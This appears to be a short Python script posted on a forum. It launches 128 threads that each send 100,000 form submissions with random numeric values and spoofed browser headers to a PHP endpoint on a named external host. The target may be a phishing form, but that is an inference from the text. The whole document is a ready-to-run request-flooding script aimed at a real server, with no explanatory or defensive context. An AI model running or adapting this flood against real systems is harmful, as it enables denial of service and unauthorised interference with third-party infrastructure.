|
|
- import random
- import requests
- from threading import Thread
- def upload():
- for i in range(100000):
- rand = str(random.randrange(100000000, 999999999))
- data = {"p": False,
- "s6dd1e4c402b7872f": "",
- "scfbad2e80f58d206": "",
- "sa7929578b408c909": "",
- "s7ff2b2e95569f56d": rand,
- "se6393254e72ffa4d": rand}
- r = requests.post('http://www.p11437.cn//1/q1q.php', data=data,
- headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko',
- 'Referer': 'http://www.p11437.cn//1/iframe.html?p=false'})
- thread_list = []
- for i in range(128):
- t = Thread(target=upload)
- thread_list.append(t)
-
- for t in thread_list:
- t.start()
复制代码 |
|